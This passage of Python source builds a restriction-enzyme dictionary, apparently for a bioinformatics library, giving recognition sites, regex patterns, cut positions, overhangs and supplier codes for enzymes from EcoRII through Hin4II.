'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCWGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B', 'J'),
}
rest_dict['EcoRII'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GATATC'),
'compsite': '(?=(?P<EcoRV>GATATC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATATC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['EcoRV'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCWWGG'),
'compsite': '(?=(?P<EcoT14I>CC[AT][AT]GG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CWWG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWWGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['EcoT14I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'ATGCAT'),
'compsite': '(?=(?P<EcoT22I>ATGCAT))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGCAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['EcoT22I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GRGCYC'),
'compsite': '(?=(?P<EcoT38I>G[AG]GC[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'RGCY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRGCYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('J',),
}
rest_dict['EcoT38I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GGCGCC'),
'compsite': '(?=(?P<EgeI>GGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['EgeI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GGCGCC'),
'compsite': '(?=(?P<EheI>GGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['EheI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCGGAG'),
'compsite': '(?=(?P<Eli8509II>CCGGAG))|(?=(?P<Eli8509II_as>CTCCGG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Eli8509II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCWWGG'),
'compsite': '(?=(?P<ErhI>CC[AT][AT]GG))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CWWG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWWGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['ErhI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TCGA'),
'compsite': '(?=(?P<EsaBC3I>TCGA))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCGA',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EsaBC3I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GACCAC'),
'compsite': '(?=(?P<EsaSSI>GACCAC))|(?=(?P<EsaSSI_as>GTGGTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACCAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EsaSSI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CAGAAG'),
'compsite': '(?=(?P<Esp3007I>CAGAAG))|(?=(?P<Esp3007I_as>CTTCTG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAGAAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Esp3007I'] = _temp()
def _temp():
return {
'charac': (7, 5, None, None, 'CGTCTC'),
'compsite': '(?=(?P<Esp3I>CGTCTC))|(?=(?P<Esp3I_as>GAGACG))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGTCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'N'),
}
rest_dict['Esp3I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCTNAGC'),
'compsite': '(?=(?P<EspI>GCT.AGC))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTNAGC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['EspI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CATG'),
'compsite': '(?=(?P<FaeI>CATG))',
'dna': None,
'freq': 256.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATG',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['FaeI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'YATR'),
'compsite': '(?=(?P<FaiI>[CT]AT[AG]))',
'dna': None,
'freq': 64.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'YATR',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['FaiI'] = _temp()
def _temp():
return {
'charac': (-8, -24, 24, 8, 'AAGNNNNNCTT'),
'compsite': '(?=(?P<FalI>AAG.....CTT))',
'dna': None,
'freq': 4096.0,
'fst3': -24,
'fst5': -8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 8,
'scd5': 24,
'site': 'AAGNNNNNCTT',
'size': 11,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['FalI'] = _temp()
def _temp():
return {
'charac': (15, 14, None, None, 'GGGAC'),
'compsite': '(?=(?P<FaqI>GGGAC))|(?=(?P<FaqI_as>GTCCC))',
'dna': None,
'freq': 1024.0,
'fst3': 14,
'fst5': 15,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGAC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['FaqI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'CATG'),
'compsite': '(?=(?P<FatI>CATG))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATG',
'size': 4,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['FatI'] = _temp()
def _temp():
return {
'charac': (9, 6, None, None, 'CCCGC'),
'compsite': '(?=(?P<FauI>CCCGC))|(?=(?P<FauI_as>GCGGG))',
'dna': None,
'freq': 1024.0,
'fst3': 6,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['FauI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CATATG'),
'compsite': '(?=(?P<FauNDI>CATATG))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATATG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['FauNDI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TGATCA'),
'compsite': '(?=(?P<FbaI>TGATCA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGATCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['FbaI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GTMKAC'),
'compsite': '(?=(?P<FblI>GT[AC][GT]AC))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'MK',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTMKAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['FblI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCVGAG'),
'compsite': '(?=(?P<Fco1691IV>GC[ACG]GAG))|(?=(?P<Fco1691IV_as>CTC[CGT]GC))',
'dna': None,
'freq': 1365.3333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCVGAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Fco1691IV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GGGAC'),
'compsite': '(?=(?P<FinI>GGGAC))|(?=(?P<FinI_as>GTCCC))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGGAC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['FinI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GGNCC'),
'compsite': '(?=(?P<FmuI>GG.CC))',
'dna': None,
'freq': 256.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNCC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['FmuI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCNGC'),
'compsite': '(?=(?P<Fnu4HI>GC.GC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['Fnu4HI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGCG'),
'compsite': '(?=(?P<FnuDII>CGCG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCG',
'size': 4,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['FnuDII'] = _temp()
def _temp():
return {
'charac': (14, 13, None, None, 'GGATG'),
'compsite': '(?=(?P<FokI>GGATG))|(?=(?P<FokI_as>CATCC))',
'dna': None,
'freq': 1024.0,
'fst3': 13,
'fst5': 14,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B', 'I', 'J', 'K', 'M', 'N', 'V', 'X', 'Y'),
}
rest_dict['FokI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GRGCYC'),
'compsite': '(?=(?P<FriOI>G[AG]GC[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'RGCY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRGCYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['FriOI'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'GGCCGGCC'),
'compsite': '(?=(?P<FseI>GGCCGGCC))',
'dna': None,
'freq': 65536.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCCGGCC',
'size': 8,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['FseI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCNGC'),
'compsite': '(?=(?P<Fsp4HI>GC.GC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Fsp4HI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'RTGCGCAY'),
'compsite': '(?=(?P<FspAI>[AG]TGCGCA[CT]))',
'dna': None,
'freq': 16384.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RTGCGCAY',
'size': 8,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['FspAI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTAG'),
'compsite': '(?=(?P<FspBI>CTAG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTAG',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['FspBI'] = _temp()
def _temp():
return {
'charac': (14, 16, None, None, 'CC'),
'compsite': '(?=(?P<FspEI>CC))|(?=(?P<FspEI_as>GG))',
'dna': None,
'freq': 16.0,
'fst3': 16,
'fst5': 14,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CC',
'size': 2,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['FspEI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'TGCGCA'),
'compsite': '(?=(?P<FspI>TGCGCA))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGCGCA',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'N'),
}
rest_dict['FspI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GARGAAG'),
'compsite': '(?=(?P<FspPK15I>GA[AG]GAAG))|(?=(?P<FspPK15I_as>CTTC[CT]TC))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GARGAAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['FspPK15I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAACA'),
'compsite': '(?=(?P<FtnUV>GAAACA))|(?=(?P<FtnUV_as>TGTTTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAACA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['FtnUV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGCGCAGG'),
'compsite': '(?=(?P<GauT27I>CGCGCAGG))|(?=(?P<GauT27I_as>CCTGCGCG))',
'dna': None,
'freq': 65536.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCGCAGG',
'size': 8,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['GauT27I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ATGCAC'),
'compsite': '(?=(?P<Gba708II>ATGCAC))|(?=(?P<Gba708II_as>GTGCAT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATGCAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Gba708II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGGCCR'),
'compsite': '(?=(?P<GdiII>CGGCC[AG]))|(?=(?P<GdiII_as>[CT]GGCCG))',
'dna': None,
'freq': 2048.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GGCC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGGCCR',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['GdiII'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCGC'),
'compsite': '(?=(?P<GlaI>GCGC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['GlaI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCNGC'),
'compsite': '(?=(?P<GluI>GC.GC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['GluI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CCCAGC'),
'compsite': '(?=(?P<GsaI>CCCAGC))|(?=(?P<GsaI_as>GCTGGG))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CCAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCAGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['GsaI'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'CTGGAG'),
'compsite': '(?=(?P<GsuI>CTGGAG))|(?=(?P<GsuI_as>CTCCAG))',
'dna': None,
'freq': 4096.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['GsuI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'WGGCCW'),
'compsite': '(?=(?P<HaeI>[AT]GGCC[AT]))',
'dna': None,
'freq': 1024.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'WGGCCW',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HaeI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'RGCGCY'),
'compsite': '(?=(?P<HaeII>[AG]GCGC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'GCGC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGCGCY',
'size': 6,
'substrat': 'DNA',
'suppl': ('J', 'K', 'N', 'R'),
}
rest_dict['HaeII'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GGCC'),
'compsite': '(?=(?P<HaeIII>GGCC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'),
}
rest_dict['HaeIII'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCGG'),
'compsite': '(?=(?P<HapII>CCGG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGG',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['HapII'] = _temp()
def _temp():
return {
'charac': (17, 9, None, None, 'TGGCCA'),
'compsite': '(?=(?P<HauII>TGGCCA))',
'dna': None,
'freq': 4096.0,
'fst3': 9,
'fst5': 17,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGGCCA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HauII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCCCAG'),
'compsite': '(?=(?P<HbaII>GCCCAG))|(?=(?P<HbaII_as>CTGGGC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCCCAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HbaII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGANNNNNNTCC'),
'compsite': '(?=(?P<HdeNY26I>CGA......TCC))|(?=(?P<HdeNY26I_as>GGA......TCG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGANNNNNNTCC',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HdeNY26I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GCANNNNNNTCC'),
'compsite': '(?=(?P<HdeZA17I>GCA......TCC))|(?=(?P<HdeZA17I_as>GGA......TGC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCANNNNNNTCC',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HdeZA17I'] = _temp()
def _temp():
return {
'charac': (10, 10, None, None, 'GACGC'),
'compsite': '(?=(?P<HgaI>GACGC))|(?=(?P<HgaI_as>GCGTC))',
'dna': None,
'freq': 1024.0,
'fst3': 10,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['HgaI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GWGCWC'),
'compsite': '(?=(?P<HgiAI>G[AT]GC[AT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'WGCW',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GWGCWC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HgiAI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGYRCC'),
'compsite': '(?=(?P<HgiCI>GG[CT][AG]CC))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GYRC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGYRCC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HgiCI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'ACCNNNNNNGGT'),
'compsite': '(?=(?P<HgiEII>ACC......GGT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCNNNNNNGGT',
'size': 12,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HgiEII'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GRGCYC'),
'compsite': '(?=(?P<HgiJII>G[AG]GC[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'RGCY',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRGCYC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['HgiJII'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCGC'),
'compsite': '(?=(?P<HhaI>GCGC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'J', 'K', 'N', 'Q', 'R', 'X'),
}
rest_dict['HhaI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GRCGYC'),
'compsite': '(?=(?P<Hin1I>G[AG]CG[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRCGYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Hin1I'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CATG'),
'compsite': '(?=(?P<Hin1II>CATG))',
'dna': None,
'freq': 256.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CATG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CATG',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Hin1II'] = _temp()
def _temp():
return {
'charac': (-8, -24, 24, 8, 'GAYNNNNNVTC'),
'compsite': '(?=(?P<Hin4I>GA[CT].....[ACG]TC))|(?=(?P<Hin4I_as>GA[CGT].....[AG]TC))',
'dna': None,
'freq': 682.6666666666666,
'fst3': -24,
'fst5': -8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 8,
'scd5': 24,
'site': 'GAYNNNNNVTC',
'size': 11,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hin4I'] = _temp()
def _temp():
return {
'charac': (11, 5, None, None, 'CCTTC'),
'compsite': '(?=(?P<Hin4II>CCTTC))|(?=(?P<Hin4II_as>GAAGG))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTTC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Hin4II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCGC'),
